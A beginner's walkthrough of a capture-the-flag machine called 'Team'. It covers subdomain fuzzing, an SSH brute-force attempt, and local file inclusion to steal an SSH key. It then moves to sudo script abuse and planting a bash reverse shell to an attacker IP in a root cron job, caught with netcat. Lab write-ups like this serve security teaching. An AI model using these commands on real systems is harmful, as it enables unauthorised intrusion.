Beginner friendly boot2root machine
If you are unsure how to tackle this, I recommend checking out the Nmap Tutorials by Hack Hunt.
nmap -sV -Pn <IP>
Looks like we have three ports open: 21, 22, 80
Let's check the webpage as port 80 is open. Well its just the Apache Server Default Page. Nothing much really.
I tried different things, didn't find much:
- 🙅 Nothing on GoBuster
- 🙅 Nothing using enum4linux
Then I checked the source code and found something interesting in the TITLE.
It says to add team.thm to the HOSTS file.
I checked the link in the browser with
. It gives me a google search results. But on the TOP is says go to the website, so I did. The result was fascinating.
I don't know about you guys! But I was little surprised with the result. Therefore, I did some search and found this is called Virtual Host Routing.
So with a new domain I tried to run the GoBuster Again: gobuster dir -u http://team/thm -w /var/share/wordlists/dirb/common.txt -x txt,php,html
robots.txt file looks interesting so I checked the file in the browser
. Huh! Just a four letter word 'dale'. Well it can be username.
As through Nmap scan we know that ssh port is open. We can now bruteforce hydra -l dale -P rockyou.txt ssh://<IP>
I waited for like hours but didn't found anything 😭
Let's try WFUZZ to check for subdomains. wfuzz -c -u http://team.thm -H "" -w <wordlist>
Wordlist I used is from SecLists. Also, we you are not sure of this commands like GoBuster and WFUZZ check Advent Of Cyber 2 on TryHackMe (Day 4).
When I tried to run the command there were two many results. So I stopped and add
--hw 977
as most of the files has this word counts.
Seems like we found subdomain
. So this is what HINT was about. Let's add the subdomain to HOSTS file and check the site.
I added
Clicking on the links takes us to another page.
Seems like a script is running and a page
variable. Wonder if the HINT was about this too 😇.
BAAAAM! We got the user flag. We know that
is a user and the flag can be in dale's root directory.
We can try for LFI here, FIRE UP your BurpSuite.
- Capture the Request
- Send it to intruer
- Select payload. For this I used Wordlist from PayloadsAllTheThings.
As the port 21, 22
are open. I first looked for the file:
- /etc/ssh/ssh_config
- /etc/ssh/sshd_config
- /etc/vsftp.config
After looking through this files. I found SSH Key of DALE in sshd_config
file. We have a SSH Key. Copy the content from ----BEGIN..
and paste in the file. I named the file id_rsa
(this is the general name used). Use chmod 600 id_rsa
(this is the general permissions of a SSH Key). Connect using ssh -i id_rsa dale@<IP>
BOOM! We got the access. Now first thing I do is check for sudo list commands. That can be done using sudo -l
There is a file which can be run using gyles
user. Let's check the content of the file.
Seems like a file which takes input from the user. Specially $error variable seems to interact with SHELL. What if we give input /bin/bash
Run the file with gyles
rights, so that we can get access to that user.
We can work with this as a shell. However, I learnt something like Shell Stabilization in Advent of Cyber 2 (Day 24)
Run command -> python -c 'import pty;pty.spawn("/bin/bash")'
BAAM! We got stable shell as
. We didn't have the password of this account. Sosudo -l
is not a good idea.
I was kinda in trouble here however I had linPEAS to rescue.
Fireup another shell and transfer
to the machine using scp -i id_rsa <location_in_your_pc> dale@10.10.7819:.
This will transfer the file to the home directory of
Let's run the file and see what kind of results we have.
There is a lot of information. But we are interested in the lines with RED color.
- User is in admin group.
- sudo version is 1.8.21p2.
- /usr/local/bin
- It is writeable directory and has a file
- In cron jobs I see the file
which is in the same dir.
- /var/backups/www/team.thm/scripts/scripts.old
Seems like a bash command and this file can be edited, as
is inadmin
group. Also, we know that this file runs asroot
(cronjobs` found via linPEAS).
Therefore, we can add the famous bash one liner to get a shell as root
- Open the file using
- Add the Bash CMD ->
bash -i >& /dev/tcp/<YOUR_IP>/4444 0>&1
. - Press
, thenY
and then ENTER.
Start a listner using nc -lvnp 4444
Wait for a while and you will have a shell as a root
You know what to do next 😜